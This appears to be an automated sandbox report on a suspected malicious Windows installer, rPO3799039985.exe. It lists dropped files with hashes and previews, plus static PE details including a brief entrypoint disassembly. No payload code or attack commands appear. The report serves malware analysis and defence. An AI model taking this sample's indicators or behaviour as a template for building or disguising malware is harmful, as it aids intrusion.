                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RFdc2c61.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RFdc2f10.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15119
                                                                                                                                                                                                        Entropy (8bit):5.63468773874796
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                                                                                                                                        MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                                                                                                                                        SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                                                                                                                                        SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                                                                                                                                        SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\cache

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:COM executable for DOS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):184
                                                                                                                                                                                                        Entropy (8bit):0.6472473490380266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                                                        MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                                                        SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                                                        SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                                                        SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:..............@?........................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\download_cache

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:COM executable for DOS
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):184
                                                                                                                                                                                                        Entropy (8bit):0.6472473490380266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:s3lt/elaaRH:sVwpH
                                                                                                                                                                                                        MD5:24127606DAC5CC6142848B0387A3AFB6
                                                                                                                                                                                                        SHA1:2DD825CBA2DED5F73DE2F70D3056764788D6B3CD
                                                                                                                                                                                                        SHA-256:7680B8117DCE679EAF37A1C4670506FDA78781CFCD994295B5108DB18FBBC3A8
                                                                                                                                                                                                        SHA-512:0C37B62B580255716371554CD47A1D7AA15A92B5376FF66D42CACF1E2FD95C027E7F8781231C4B0D9CCC17521A94F1E719CFD2307853D6D7D72DD8155BA6868B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:..............@?........................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\warnStateCache

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                        Entropy (8bit):1.23900521981086
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MlwlaaRX:kwpX
                                                                                                                                                                                                        MD5:3F66F244278461DD07A3FEB77A17712F
                                                                                                                                                                                                        SHA1:8D570B550699AD0F248EC98B5D678F54248C0A84
                                                                                                                                                                                                        SHA-256:203CE5C7C1680C6E98F5CECA920E9D904122A9E26A743191E9B0FE1F6584ED60
                                                                                                                                                                                                        SHA-512:8D4733222E2E0BBC18370055D0602D0389E7A562887E97B2E54073017FFEA024E9B1341ED95E28883861EF5E0D4FA9D27ED0894912FFE167632AED2E4CF53E7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:H.......0.....@?........................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44zjqjpn.11f.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmcajas1.t15.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crgaedfo.n2n.ps1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqafyrne.pmx.psm1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bhvB3DD.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2cbb85f5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14680064
                                                                                                                                                                                                        Entropy (8bit):0.14200681157865014
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:fSB2w+SB2wdSjlK/zAuvJgvs4zG2yeurJgxs4RG2yD0Hwhc3P0JCPOdNuzZuFTFf:faYacSWj7iOjDyMPwE
                                                                                                                                                                                                        MD5:9C31A797A681D2C51AEB25234300C80F
                                                                                                                                                                                                        SHA1:044C77D208AB337F9D80A981F5CB6BE488988D76
                                                                                                                                                                                                        SHA-256:8210BAB7533D2BA23D97911B72F6AC55784230F156B8067D5D4A1BE7C142B374
                                                                                                                                                                                                        SHA-512:CA0A5D1FA6005F29549976B2C6F14A133684A0CFA1113F44F86ACBFC93C1CD193856CDFD0E987444B4E06424AF530DA1CDF88BD868D24091A32FD76422E1A313
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:,...... ................{..*...y...............................&...|.......|..h...........................4B...*...y..........................................................................................................bJ......n........................................................................................................... .......1;...|...............................................................................................................................................................................................*...y_.................................}G.......|....................J......|...........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                        Entropy (8bit):7.805842466953427
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:rPO3799039985.exe
                                                                                                                                                                                                        File size:687'803 bytes
                                                                                                                                                                                                        MD5:efb9125831992267d27c5dd9a2bdc0be
                                                                                                                                                                                                        SHA1:0be2e44632121c8fc2f325ed4af6b91e49486711
                                                                                                                                                                                                        SHA256:7028c43edb1ed93fee2d535a938b07a687d01cf5a5e4dc9e9104d5fa372089ca
                                                                                                                                                                                                        SHA512:b3ba5a31a5012907853cef9ee1bc2aefbb084be4dfab095b695065dc1bd460546b7fbce10788010168977562d5a859c471dac44c712b5efa3f0d60cb6ccf1383
                                                                                                                                                                                                        SSDEEP:12288:NiNbeGX4+5+aeLJOwLqgUf5/G2ywJCfANIsCssyKBsFLL+Wlra97H6Vy:ib9l+PMxgGJGhs0iLaWl8ac
                                                                                                                                                                                                        TLSH:92E402A7765284D6C4EB46F01F96D76073FCB8AC87C1074FB2D76A289652383247928F
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:27eee66466b2bc17

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x40310f
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        sub esp, 00000184h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                                                                                                        mov dword ptr [esp+10h], 00409198h
                                                                                                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                                        call dword ptr [004070A8h]
                                                                                                                                                                                                        call dword ptr [004070A4h]
                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                        je 00007FC7EC3F83A3h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call 00007FC7EC3FB311h
                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                        je 00007FC7EC3F8399h
                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                        call eax
                                                                                                                                                                                                        mov esi, 00407298h
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        call 00007FC7EC3FB28Dh
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        call dword ptr [004070A0h]
                                                                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                                                                                                        jne 00007FC7EC3F837Dh
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        push 00000009h
                                                                                                                                                                                                        call 00007FC7EC3FB2E4h
                                                                                                                                                                                                        push 00000007h
                                                                                                                                                                                                        call 00007FC7EC3FB2DDh
                                                                                                                                                                                                        mov dword ptr [0042E404h], eax
                                                                                                                                                                                                        call dword ptr [00407044h]
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call dword ptr [00407288h]
                                                                                                                                                                                                        mov dword ptr [0042E4B8h], eax
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                        push 00000160h
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push 00428828h
                                                                                                                                                                                                        call dword ptr [00407174h]
                                                                                                                                                                                                        push 00409188h
                                                                                                                                                                                                        push 0042DC00h
                                                                                                                                                                                                        call 00007FC7EC3FAF07h
                                                                                                                                                                                                        call dword ptr [0040709Ch]
                                                                                                                                                                                                        mov ebp, 00434000h
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        call 00007FC7EC3FAEF5h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        call dword ptr [00407154h]

                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x25530.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .ndata0x2f0000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .rsrc0x3e0000x255300x256009f55b761ab865e3d7495845bec25ddbeFalse0.6279264214046822data6.673760766904296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                        Resources

                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_ICON0x3e3b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.33418608777948655
                                                                                                                                                                                                        RT_ICON0x4ebe00xe47bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9980680788497376
                                                                                                                                                                                                        RT_ICON0x5d0600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5007261410788382
                                                                                                                                                                                                        RT_ICON0x5f6080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5839587242026266
                                                                                                                                                                                                        RT_ICON0x606b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.6289978678038379
                                                                                                                                                                                                        RT_ICON0x615580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.7572202166064982
                                                                                                                                                                                                        RT_ICON0x61e000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7261560693641619
                                                                                                                                                                                                        RT_ICON0x623680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7597517730496454
                                                                                                                                                                                                        RT_ICON0x627d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5241935483870968
                                                                                                                                                                                                        RT_ICON0x62ab80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5912162162162162
                                                                                                                                                                                                        RT_DIALOG0x62be00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                        RT_DIALOG0x62ce00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                        RT_DIALOG0x62e000xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                        RT_DIALOG0x62ec80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                        RT_GROUP_ICON0x62f280x92dataEnglishUnited States0.6575342465753424
                                                                                                                                                                                                        RT_VERSION0x62fc00x22cdataEnglishUnited States0.5341726618705036
                                                                                                                                                                                                        RT_MANIFEST0x631f00x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
